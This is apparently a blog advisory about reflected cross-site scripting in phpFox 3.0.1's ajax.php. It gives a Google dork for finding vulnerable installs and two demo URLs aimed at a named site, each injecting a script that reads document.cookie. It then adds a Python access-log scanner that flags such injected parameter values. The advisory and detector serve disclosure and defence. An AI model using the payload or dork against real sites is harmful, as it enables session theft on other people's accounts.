
PhpFox 3.0.1 Cross Site Scripting (XSS)

PhpFox 3.0.1 Cross Site Scripting. An XSS security vulnerability was discovered in version 3.0.1 of PhpFox.
PhpFox 3.0.1 Cross Site Scripting | Juno_okyo's Blog


Google Dork: Intext:"Powered By phpFox Version 3.0.1"

Vendor Home : http://www.phpfox.com/

Many parameters in the ajax.php file are vulnerable to XSS, such as feed_id, message, title, ...

Demo


http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467
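
A defensive check for the parameters named above, added here as an example and not taken from the original post or from phpFox: it scans web-server access-log lines for ajax.php requests whose feed_id or item_id is not a plain number, or whose message or title carries markup characters. The numeric-ID rule, the combined log format and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as reflected by ajax.php.
ID_PARAMS = {"feed_id", "item_id"}    # assumption: legitimate values are numeric IDs
TEXT_PARAMS = {"message", "title"}    # free text, so only markup characters are flagged
NUMERIC = re.compile(r"[0-9]+")
MARKUP = re.compile(r"[<>\"']")

# Request part of a combined-format access-log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines; client addresses are from a documentation range
    '203.0.113.7 - - [01/Sep/2012:18:53:23 +0000] "GET /static/ajax.php'
    '?core[call]=comment.viewMoreFeed&feed_id=41&item_id=518 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Sep/2012:18:54:02 +0000] "GET /static/ajax.php'
    '?core[call]=comment.viewMoreFeed&feed_id=%22%3E%3Cscript%3Ealert(document.cookie)'
    '%3C/script%3E&item_id=518 HTTP/1.1" 200 530',
    '203.0.113.9 - - [01/Sep/2012:18:54:40 +0000] "GET /static/ajax.php'
    '?feed_id=41&item_id=518&title=%3Cb%3Ehi HTTP/1.1" 200 498',
]


def suspicious_params(url):
    """Return sorted names of ajax.php parameters whose decoded value looks injected."""
    parts = urlsplit(url)
    if not parts.path.endswith("/ajax.php"):
        return []
    hits = set()
    # parse_qsl percent-decodes, so %22%3E is inspected as the characters "> .
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in ID_PARAMS and not NUMERIC.fullmatch(value):
            hits.add(name)
        elif name in TEXT_PARAMS and MARKUP.search(value):
            hits.add(name)
    return sorted(hits)


def scan(log_lines):
    """Yield (line_number, parameter_names) for every flagged log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious value in {', '.join(names)}")
```

Only query-string values reach the access log, so parameters sent in a POST body need the same check at the application or WAF layer.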
Leader at J2TEAM. Website: https://j2team.dev/